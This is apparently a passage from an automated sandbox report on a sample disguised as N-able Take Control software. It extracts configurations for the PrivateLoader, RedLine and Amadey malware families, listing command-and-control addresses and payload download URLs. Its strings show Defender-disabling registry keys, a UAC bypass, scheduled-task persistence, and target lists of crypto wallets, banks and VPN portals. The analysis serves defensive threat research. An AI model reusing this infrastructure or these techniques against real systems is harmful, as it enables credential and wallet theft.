  - oneetx.exe (PID: 2460)
  - ss41.exe (PID: 2816)
  - lSbth8S3.exe (PID: 600)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - tP7uGPGB.exe (PID: 1840)
  - RegSvcs.exe (PID: 1776)
  - oneetx.exe (PID: 2624)
  - WeUOGHq.exe (PID: 2660)
  - iQegscw.exe (PID: 2136)
  - oneetx.exe (PID: 3068)
- Reads the machine GUID from the registry
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - nQ2McWUAX9KJf6qCzwXYqN1T.exe (PID: 968)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - newplayer.exe (PID: 2496)
  - Install.exe (PID: 2704)
  - oneetx.exe (PID: 2880)
  - ss41.exe (PID: 2816)
  - Rec619.exe (PID: 2940)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - RegSvcs.exe (PID: 1776)
  - iQegscw.exe (PID: 2136)
- Reads the computer name
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - nQ2McWUAX9KJf6qCzwXYqN1T.exe (PID: 968)
  - is-1SI1D.tmp (PID: 2680)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - newplayer.exe (PID: 2496)
  - Install.exe (PID: 2704)
  - oneetx.exe (PID: 2880)
  - ss41.exe (PID: 2816)
  - Rec619.exe (PID: 2940)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - RegSvcs.exe (PID: 1776)
  - iQegscw.exe (PID: 2136)
- The process checks LSA protection
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - is-1SI1D.tmp (PID: 2680)
  - taskkill.exe (PID: 1396)
  - taskkill.exe (PID: 1480)
  - nQ2McWUAX9KJf6qCzwXYqN1T.exe (PID: 968)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - newplayer.exe (PID: 2496)
  - Install.exe (PID: 2704)
  - oneetx.exe (PID: 2880)
  - ss41.exe (PID: 2816)
  - taskkill.exe (PID: 1988)
  - taskkill.exe (PID: 2616)
  - Rec619.exe (PID: 2940)
  - explorer.exe (PID: 1960)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - RegSvcs.exe (PID: 1776)
  - taskkill.exe (PID: 1460)
  - iQegscw.exe (PID: 2136)
  - rundll32.exe (PID: 868)
- Process checks computer location settings
  - WWW14_64[1].exe (PID: 3020)
  - iQegscw.exe (PID: 2136)
- Checks proxy server information
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - oneetx.exe (PID: 2880)
  - ss41.exe (PID: 2816)
  - Rec619.exe (PID: 2940)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
- Creates files or folders in the user directory
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - oneetx.exe (PID: 2880)
  - ss41.exe (PID: 2816)
  - Rec619.exe (PID: 2940)
  - explorer.exe (PID: 1960)
  - aOu2C.exe (PID: 2032)
  - iQegscw.exe (PID: 2136)
- Create files in a temporary directory
  - yB5qNHqacgsT4DPHSAOjLFqT.exe (PID: 1788)
  - IZfNITzXXVGKJ4hJs21Ql_MK.exe (PID: 1400)
  - is-1SI1D.tmp (PID: 2680)
  - Install.exe (PID: 1032)
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - newplayer.exe (PID: 2496)
  - oneetx.exe (PID: 2880)
  - Install.exe (PID: 2704)
- Application was dropped or rewritten from another process
  - is-1SI1D.tmp (PID: 2680)
- Creates files in the program directory
  - is-1SI1D.tmp (PID: 2680)
  - OLyqnVbF.exe (PID: 2236)
  - iQegscw.exe (PID: 2136)
- Reads Environment values
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - aOu2C.exe (PID: 2032)
  - RegSvcs.exe (PID: 1776)
  - OLyqnVbF.exe (PID: 2236)
- Reads product name
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
- Reads CPU info
  - OLyqnVbF.exe (PID: 2236)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

PrivateLoader

(PID) Process(2024) xYnUz2QC_ocIkOYsP8huHqbV.exe

C2 (8)http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

45.15.156.229

94.131.106.196

5.181.80.133

94.142.138.131

94.142.138.113

208.67.104.60

Attributes

Payload (36)https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1

https://vk.com/doc746114504_647280734?hash=Doz4iot4bg0WOvZC8ZMInERV5U1fmjrKZZhl7jf6wBE&dl=G42DMMJRGQ2TANA:1661413506:vGfIf9YivGqE9gd11wvm9KZLzv9DMwdM9Wp0LmcsAhz&api=1&no_preview=1

https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

https://c.xyzgamec.com/userdown/2202/random.exe

http://193.56.146.76/Proxytest.exe

http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

http://luminati-china.xyz/aman/casper2.exe

https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

http://185.215.113.208/ferrari.exe

https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

http://mnbuiy.pw/adsli/note8876.exe

https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

https://iplogger.org/2BTmf7

https://iplogger.org/2BAmf7

https://iplogger.org/2BDmf7

https://iplogger.org/2BFmf7

https://iplogger.org/2s2pg6

https://iplogger.org/2s3pg6

https://iplogger.org/2s4pg6

https://iplogger.org/2s5pg6

https://iplogger.org/2s6pg6

https://iplogger.org/2s7pg6

Strings (823)Snowman+under_a_sn0wdrift_forgot_the_Snow_Maiden

iplogger.org/1nhuM4.js

SOFTWARE\LilFreske

Installed

SOFTWARE\LilFreskeUS

IsWow64Process

GetModuleHandleA

LoadLibraryA

SetPriorityClass

Sleep

GetTempPathA

CreateProcessA

GetFileAttributesA

CreateDirectoryA

CreateThread

CloseHandle

VirtualAlloc

VirtualFree

OpenProcess

TerminateProcess

GetUserGeoID

ntdll.dll

NtQuerySystemInformation

RtlGetVersion

Shell32.dll

ShellExecuteA

SHGetFolderPathA

Advapi32.dll

RegOpenKeyExA

RegSetValueExA

RegCloseKey

RegCreateKeyExA

RegDeleteKeyA

RegDeleteValueA

RegQueryValueExA

RegEnumKeyExA

ConvertSidToStringSidA

LookupAccountNameA

WINHTTP.dll

wininet.dll

GetComputerNameA

VerSetConditionMask

VerifyVersionInfoW

GetGeoInfoA

GetCurrentProcess

GetVersionExA

MultiByteToWideChar

WideCharToMultiByte

GetCurrentProcessId

CreateToolhelp32Snapshot

Process32First

Process32Next

Wow64DisableWow64FsRedirection

Wow64RevertWow64FsRedirection

User32.dll

CharToOemA

//Minor Policy

SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions

Exclusions_Extensions

SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions

SOFTWARE\Policies\Microsoft\Windows Defender

DisableAntiSpyware

DisableRoutinelyTakingAction

SOFTWARE\Policies\Microsoft\Windows\System

EnableSmartScreen

SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

DisableBehaviorMonitoring

DisableOnAccessProtection

DisableScanOnRealtimeEnable

DisableRealtimeMonitoring

DisableIOAVProtection

DisableRawWriteNotification

Windows Server 2016

Windows Server 2012 R2

Windows Server 2012

Windows Server 2008 R2

Windows Server 2008

Windows Server

Windows 10

Windows 8.1

Windows 8

Windows 7

Windows Vista

Windows XP

(x64)

(x32)

explorer.exe

current

children

SOFTWARE\Classes\ms-settings\Shell\Open\command

DelegateExecute

\ComputerDefaults.exe

SOFTWARE\Classes

ms-settings\Shell\Open\command

ms-settings\Shell\Open

ms-settings\Shell

ms-settings

data=

/api/firegate.php

Error!

onlyType

ext_url

cfg_url

ipinfo.io/widget

country

company

Google LLC

db-ip.com

data-api-key="

/self

countryCode

organization

www.maxmind.com/geoip/v2.1/city/me

iso_code

traits

GetIP

api.ipgeolocation.io/ipgeo?include=hostname&ip=

country_code2

/api/tracemap.php

http://

15.5pnp.10.lock

Guest Profile

System Profile

\Google\Chrome\Application

(x86)\Google\Chrome\Application

SOFTWARE\Google\Chrome\BLBeacon

version

\resources.pak

SOFTWARE\Google\Chrome\PreferenceMACs

\Google\Chrome\User Data\

\Secure Preferences

filter_browsers

chrome

browser

use_open_browser

extensions

settings

install_time

\Extensions\

\u003C

protection

extensions.settings.

super_mac

chrome.exe

ChromeRegistryHashStoreValidationSeed

\extensions.settings

SOFTWARE\Google\Chrome\PreferenceMACs\

\chrome.exe

\Microsoft\Edge\Application

(x86)\Microsoft\Edge\Application

SOFTWARE\Microsoft\Edge\BLBeacon

SOFTWARE\Microsoft\Edge\PreferenceMACs

\Microsoft\Edge\User Data\

msedge.exe

SOFTWARE\Microsoft\Edge\PreferenceMACs\

\msedge.exe

\Roaming

\atomic

\Atomic Wallet

\com.liberty.jaxx

\Electrum

\Exodus

\MultiDoge

\Monero

\binance.chain

\Binance

\Metamask

\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec

\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp

\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec

\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa

\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh

\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn

\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca

\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn

\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee

\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf

\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo

\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm

sorare.com

yobit.net

zb.com

binance.com

huobi.com

okex.com

hitbtc.com

bitfinex.com

kraken.com

bitstamp.net

payoneer.com

bittrex.com

bittrex.zendesk.com

gate.io

exmo.com

yobit.io

bitflyer.com

poloniex.com

kucoin.com

coinone.co.kr

localbitcoins.com

korbit.co.kr

cex.io

luno.com

bitkonan.com

jubi.com

koinex.in

koineks.com

kuna.io

koinim.com

kiwi-coin.com

leoxchange.com

lykke.com

localtrade.cc

magnr.com

lbank.info

itbit.com

gemini.com

gdax.com

gatehub.net

satoshitango.com

foxbit.com.br

flowbtc.com.br

exx.com

exrates.me

excambriorex.com

ezbtc.ca

infinitycoin.exchange

tdax.com

stex.com

vbtc.exchange

coinmarketcap.com

vwlpro.com

nocks.com

nlexch.com

novaexchange.com

mynxt.info

nzbcx.com

nevbit.com

mixcoins.com

mr.exchange

neraex.pro

dsx.uk

okcoin.com

liquid.com

quoine.com

quadrigacx.com

rightbtc.com

rippex.net

ripplefox.com

qryptos.com

ore.bz

openledger.info

omnidex.io

paribu.com

paymium.com

dcexchange.ru

dcexe.com

bitmex.com

funpay.ru

bitmaszyna.pl

bitonic.nl

bitpanda.com

bitsblockchain.net

bitmarket.net

bitlish.com

bitfex.trade

blockchain.com

blockchain.info

cryptofresh.com

btcmarkets.net

braziliex.com

btc-trade.com.ua

btc-alpha.com

bitspark.io

bitso.com

bittylicious.com

altcointrader.co.za

arenabitcoin.com

allcoin.com

796.com

abucoins.com

aidosmarket.com

bitcointrade.com

bitcointoyou.com

bitbanktrade.jp

big.one

bcex.ca

bitconnect.co

coinsbank.com

coinsecure.in

coinsquare.com

coinspot.io

coinsmarkets.com

crypto-bridge.org

dcex.com

dabtc.com

decentrex.com

deribit.com

dgtmarket.com

btcturk.com

btcxindia.com

bt.cx

bitstarcoin.com

coincheck.com

coinmate.io

coingi.com

coinnest.co.kr

coinrail.co.kr

coinpit.io

coingather.com

coinfloor.co.uk

coinegg.com

coincorner.com

coinexchange.io

pancakeswap.finance

coinbase.com

livecoin.net

mercatox.com

cryptobridge.freshdesk.com

volabit.com

tradeogre.com

bitkub.com

uphold.com

wallet.uphold.com

tidex.com

coinome.com

coinpayments.net

bitmax.io

bitbank.cc

independentreserve.com

bitmart.com

cryptopia.co.nz

cryptonator.com

advcash.com

my.dogechain.info

spectrocoin.com

exir.io

exir.tech

coinbene.com

bitforex.com

gopax.co.kr

catex.io

vindax.com

coineal.com

maicoin.com

finexbox.com

etherflyer.com

bx.in.th

bitopro.com

citex.co.kr

coinzo.com

atomars.com

coinfinit.com

bitker.com

dobitrade.com

btcexa.com

satowallet.com

cpdax.com

trade.io

btcnext.io

exmarkets.com

btc-exchange.com

chaoex.com

jex.com

therocktrading.com

gdac.com

southxchange.com

tokens.net

fexpro.net

btcbox.co.jp

coinmex.com

cryptology.com

cointiger.com

cashierest.com

coinbit.co.kr

mxc.com

bilaxy.com

coinall.com

coindeal.com

omgfin.com

oceanex.pro

bithumb.com

ftx.com

shortex.net

coin.z.com

fcoin.com

fatbtc.com

tokenize.exchange

simex.global

instantbitex.com

\Login Data

SOFTWARE\BraveSoftware\Brave-Browser\PreferenceMACs

\BraveSoftware\Brave-Browser\User Data\

SOFTWARE\CryptoTab Browser\PreferenceMACs

\CryptoTab Browser\User Data\

\Opera Software\Opera Stable

ascendex.com

crypto.com

coins.ph

coins.th

dogechain.info

miningpoolhub.com

/vpn/index.html

portal/webclient

remote/login

/vpn/tmindex.html

/LogonPoint/tmindex.html

XenApp1/auth/login.aspx

auth/silentDetection.aspx

/citrix/

/RDWeb/

/+CSCOE+/

/global-protect/

sslvpn.

/dana-na/

/my.policy

ncsecu.org

penfed.org

becu.org

schoolsfirstfcu.org

firsttechfed.com

golden1.com

alliantcreditunion.org

americafirst.com

suncoastcreditunion.com

secumd.org

safecu.org

missionfed.com

greendot.com

rbfcu.org

macu.com

dcu.org

ssfcu.org

bethpagefcu.com

starone.org

alaskausa.org

sdccu.com

aacreditunion.org

lmcu.org

teachersfcu.org

patelco.org

esl.org

onpointcu.com

logixbanking.com

psecu.com

deltacommunitycu.com

ent.com

cefcu.com

greenstate.org

unfcu.org

pffcu.org

wingsfinancial.com

iccu.comdesertfinancial.com

iccu.com

desertfinancial.com

hvfcu.org

wpcu.coop

redwoodcu.org

tcunet.com

wsecu.org

joviafinancial.com

coastal24.com

myeecu.org

gecreditunion.org

nymcu.org

affinityfcu.com

towerfcu.org

ccu.com

communityamerica.com

langleyfcu.org

credithuman.com

techcu.com

gecu.com

kfcu.org

applefcu.org

nasafcu.com

sfcu.org

genisyscu.org

unifyfcu.com

apcocu.org

firstcommunity.com

unitedfcu.com

fairwinds.org

ufcu.org

wescom.org

bcu.org

vacu.org

citadelbanking.com

servicecu.org

summitcreditunion.com

gesa.com

chevronfcu.org

traviscu.org

uwcu.org

communityfirstcu.org

ecu.org

sccu.com

bfsfcu.org

bellco.org

dfcufinancial.com

msufcu.org

members1st.org

landmarkcu.com

kinecta.org

midflorida.com

visionsfcu.org

veridiancu.org

statefarmfcu.com

tinkerfcu.org

sefcu.com

americanheritagecu.org

robinsfcu.org

canvas.org

growfinancial.org

truliantfcu.org

ascend.org

foundersfcu.com

calcoastcu.org

ucu.org

connexuscu.org

slfcu.org

numericacu.com

eecu.org

georgiasown.org

nusenda.org

tvacreditunion.com

pcu.org

msgcu.org

nuvisionfederal.com

trumarkonline.org

navigantcu.org

ornlfcu.com

jscfcu.org

lgfcu.org

elevationscu.com

gtefinancial.org

chartway.com

ecu.com

sdfcu.org

apcu.com

schools.org

metrocu.org

campuscu.com

adviacu.org

psfcu.com

andrewsfcu.org

eglinfcu.org

imcu.com

americaneagle.org

ttcu.com

vantagewest.org

empowerfcu.com

rfcu.com

capcomfcu.org

arizonafederal.org

csecreditunion.com

communityfirstfl.org

bayportcu.org

gwcu.org

wecu.com

stgeorge.com.au

imb.com.au

ing.com.au

bankofmelbourne.com.au

regionalaustraliabank.com

suncorp.com.au

regionalaustraliabank.com.au

bmo.com

cwbank.com

royalbank.com

vancity.com

servus.ca

coastcapitalsavings.com

alterna.ca

interiorsavings.com

synergycu.ca

mainstreetcu.ca

cu.com

fcu.com

robinhood.com

navyfederal.org

tboholidays.com

24x7rooms.com

adonis.com

abreuonline.com

almundo.com.ar

bonotel.com

bookohotel.com

didatravel.com

dotwconnect.com

eetglobal.com

escalabeds.com

fastpayhotels.com

getaroom.com

goglobal.travel

hoteldo.com.mx

hotelspro.com

jumbonline.com

kaluahtours.com

lci-euro.com

lotsofhotels.com

mikinet.co.uk

misterroom.com

nexustours.com

olympiaeurope.com

paximum.com

restel.es

rezserver.com

rezlive.com

sunhotels.com

totalstay.com

travco.co.uk

travellanda.com

smyrooms.com

welcomebeds.com

yalago.com

hotelbeds.com

mercadolibre.com.mx

hsbc.com.mx

bbvanetcash.mx

scotiabank.com.mx

santander.com.mx

bbva.mx

opensea.io

plantvsundead.com

axieinfinity.com

cryptocars.me

bombcrypto.io

cryptoplanes.me

cryptozoon.io

bankalhabib.com

correosprepago.es

orangebank.es

amazon.it

amazon.ca

amazon.de

amazon.com

netspend.com

online.citi.com

cloud.ibm.com

ca.ovh.com

account.alibabacloud.com

cloud.huawei.com

cloud.tencent.com

vultr.com

aws.amazon.com

portal.azure.com

digitalocean.com

console.scaleway.com

hetzner.com

linode.com

oracle.com

rackspace.com

phoenixnap.com

leaseweb.com

sso.ctl.io

ctl.io

lumen.com

paypal.com

WW_P_7

WW_P_8

https://

WW_P_

WW_P_1

links

ezstat.ru/1BfPg7

USA_1

iplis.ru/1BX4j7.png

iplis.ru/1BV4j7.mp4

USA_2

iplogger.org/1nkuM4.jpeg

iplis.ru/1BNhx7.mp3

iplis.ru/1pRXr7.txt

SetIncrement|ww_starts

false

iplis.ru/1S2Qs7.mp3

iplis.ru/1S3fd7.mp3

iplis.ru/17VHv7.mp3

iplis.ru/1GLDc7.mp3

iplis.ru/1xDsk7.mp3

iplis.ru/1xFsk7.mp3

WW_OPERA

iplis.ru/1GCuv7.pdf

iplis.ru/1lmex.mp3

iplis.ru/1Gemv7.mp3

WW_10

iplis.ru/1Gymv7.mp3

WW_11

iplis.ru/1tqHh7.mp3

WW_12

iplis.ru/1aFYp7.mp3

WW_13

iplis.ru/1cC8u7.mp3

WW_14

iplis.ru/1cN8u7.mp3

WW_15

iplis.ru/1kicy7.mp3

iplis.ru/1BMhx7.mp3

WW_16

iplis.ru/1edLy7.png

WW_17

iplis.ru/1nGPt7.png

WW_P_2

iplis.ru/1Bshv7.mp3

WW_P_3

iplis.ru/1Lgnh7.mp3

WW_P_4

iplis.ru/1vt8c7.mp3

WW_P_5

iplis.ru/1IcfD.mp3

WW_P_6

iplis.ru/1eXqs7.mp3

iplis.ru/1Unzy7.mp3

WW_18

iplis.ru/12hYs7.mp3

WW_19

iplis.ru/12d8d7.mp3

WW_20

iplis.ru/1Uvgu7.mp3

WW_21

iplis.ru/1jvTz7.mp3

browsers

Chrome:

Edge:

os_country_code

ip_country

AddExtensionStat|

net_country_code

https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1

https://vk.com/doc746114504_647280734?hash=Doz4iot4bg0WOvZC8ZMInERV5U1fmjrKZZhl7jf6wBE&dl=G42DMMJRGQ2TANA:1661413506:vGfIf9YivGqE9gd11wvm9KZLzv9DMwdM9Wp0LmcsAhz&api=1&no_preview=1

https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

https://c.xyzgamec.com/userdown/2202/random.exe

http://193.56.146.76/Proxytest.exe

http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

http://91.241.19.125/pub.php?pub=one

http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

http://luminati-china.xyz/aman/casper2.exe

https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

http://185.215.113.208/ferrari.exe

https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

http://mnbuiy.pw/adsli/note8876.exe

http://sarfoods.com/index.php

https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

https://iplogger.org/2BTmf7

https://iplogger.org/2BAmf7

https://iplogger.org/2BDmf7

https://iplogger.org/2BFmf7

https://iplogger.org/2s2pg6

https://iplogger.org/2s3pg6

https://iplogger.org/2s4pg6

https://iplogger.org/2s5pg6

https://iplogger.org/2s6pg6

https://iplogger.org/2s7pg6

crypto_wallets

domain

bank_wallets

cu_bank_wallets

shop_wallets

bank_au_wallets

amazon_eu

webhosts

paypal

bank_ca_wallets

browser_vbmt

GetCryptoSleeping

45.15.156.229

94.131.106.196

5.181.80.133

94.142.138.131

94.142.138.113

208.67.104.60

cryptoWallets

status

bankWallets

cuBankWallets

shops

bankAUWallets

bankCAWallets

cryptoWallets_part1

cryptoWallets_part2

bankWallets_part1

bankWallets_part2

bankMXWallets

cryptoGames

bankPKWallets

bankESWallets

SetLoaderAnalyze|

SetIncrement|not_elevated

WinHttpConnect

WinHttpQueryHeaders

WinHttpOpen

WinHttpOpenRequest

WinHttpQueryDataAvailable

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpReadData

WinHttpCloseHandle

WinHttpSetTimeouts

InternetOpenA

InternetSetOptionA

HttpOpenRequestA

InternetConnectA

InternetOpenUrlA

HttpQueryInfoA

InternetQueryOptionA

HttpSendRequestA

InternetReadFile

InternetCloseHandle

RedLine

(PID) Process(2472) FRZtC1UE1QkxZFvXULsFUiqN.exe

C2 (1)185.225.74.51:44767

Botnetrt2

Err_msg

Auth_valuedc7db5b7b2a3c650d2442bad9e77751a

US (14)

net.tcp://

localhost

dc7db5b7b2a3c650d2442bad9e77751a

Authorization

ns1

CCYAXiELJxAvMHFBKSxZUCM9DlMLNgRdIxZTVA==

Jhw2Fg==

Ergomaniac

(PID) Process(1840) tP7uGPGB.exe

C2 (1)95.216.249.153:81

Botnet2

Err_msg

Auth_value101013a5e99e0857595aae297a11351d

US (14)

net.tcp://

localhost

101013a5e99e0857595aae297a11351d

Authorization

ns1

BTssHCMND101AydXBTxNESAzB1k2LSta

BwhEVA==

Joying

Amadey

(PID) Process(2880) oneetx.exe

C2 (1)http://45.9.74.80

Version3.83

Options

Drop directory207aa4515d

Drop nameoneetx.exe

Strings (116)SCHTASKS

/Create /SC MINUTE /MO 1 /TN

/TR "

" /F

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Startup

Rem

cmd /C RMDIR /s/q

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

rundll32

/Delete /TN "

Programs

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

%USERPROFILE%

\App

POST

GET

id=

&vs=

&sd=

&os=

&bi=

&ar=

&pc=

&un=

&dm=

&av=

&lv=

&og=

cred.dll|clip.dll|

Main

http://

https://

exe

dll

cmd

ps1

<c>

<d>

Plugins/

+++

&unit=

shell32.dll

kernel32.dll

GetNativeSystemInfo

ProgramData\

AVAST Software

Avira

Kaspersky Lab

ESET

Panda Security

Doctor Web

AVG

360TotalSecurity

Bitdefender

Norton

Sophos

Comodo

WinDefender

0123456789

Content-Type: multipart/form-data; boundary=----

------

Content-Disposition: form-data; name="data"; filename="

" Content-Type: application/octet-stream

------

?scr=1

.jpg

Content-Type: application/x-www-form-urlencoded

SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

ComputerName

abcdefghijklmnopqrstuvwxyz0123456789-_

-unicode-

SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\

SYSTEM\ControlSet001\Services\BasicDisplay\Video

VideoID

\0000

DefaultSettings.XResolution

DefaultSettings.YResolution

SOFTWARE\Microsoft\Windows NT\CurrentVersion

ProductName

2019

2022

2016

CurrentBuild

echo Y|CACLS "

" /P "

:N"

CACLS "

" /P "

:R" /E

:F" /E

&&Exit

..\

:::

rundll32.exe

"taskkill /f /im "

" && timeout 1 && del

&& Exit"

" && ren

Powershell.exe

-executionpolicy remotesigned -File "

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (87.3)
.exe	\|	Generic Win/DOS Executable (6.3)
.exe	\|	DOS Executable Generic (6.3)

EXIF

EXE

ProductVersion:	7.0.45.1145
ProductName:	TCDirectChat
ProgramID:	com.embarcadero.TCDirectChat
InternalName:	N-able Take Control
FileVersion:	7.0.45.1145
FileDescription:	TCDirectChat
CompanyName:	N-able Take Control
CharacterSet:	Windows, Latin1
LanguageCode:	English (U.S.)
FileSubtype:	-
ObjectFileType:	Executable application
FileOS:	Win32
FileFlags:	(none)
FileFlagsMask:	0x003f
ProductVersionNumber:	7.0.45.1145
FileVersionNumber:	7.0.45.1145
Subsystem:	Windows GUI
SubsystemVersion:	6
ImageVersion:	-
OSVersion:	6
EntryPoint:	0xa6c7a2
UninitializedDataSize:	-
InitializedDataSize:	1209344
CodeSize:	3128832
LinkerVersion:	14.29
PEType:	PE32+
ImageFileCharacteristics:	Executable, Large address aware
TimeStamp:	2023:06:12 18:12:38+00:00
MachineType:	AMD AMD64

Summary

Architecture:	IMAGE_FILE_MACHINE_AMD64
Subsystem:	IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:	12-Jun-2023 18:12:38
Detected languages:	English - United States
CompanyName:	N-able Take Control
FileDescription:	TCDirectChat
FileVersion:	7.0.45.1145
InternalName:	N-able Take Control
ProgramID:	com.embarcadero.TCDirectChat
ProductName:	TCDirectChat
ProductVersion:	7.0.45.1145

DOS Header

Magic number:	MZ
Bytes on last page of file:	0x0090
Pages in file:	0x0003
Relocations:	0x0000
Size of header:	0x0004
Min extra paragraphs:	0x0000
Max extra paragraphs:	0xFFFF
Initial SS value:	0x0000
Initial SP value:	0x00B8
Checksum:	0x0000
Initial IP value:	0x0000
Initial CS value:	0x0000
Overlay number:	0x0000
OEM identifier:	0x0000
OEM information:	0x0000
Address of NE header:	0x00000080

PE Headers

Signature:	PE
Machine:	IMAGE_FILE_MACHINE_AMD64
Number of sections:	10
Time date stamp:	12-Jun-2023 18:12:38
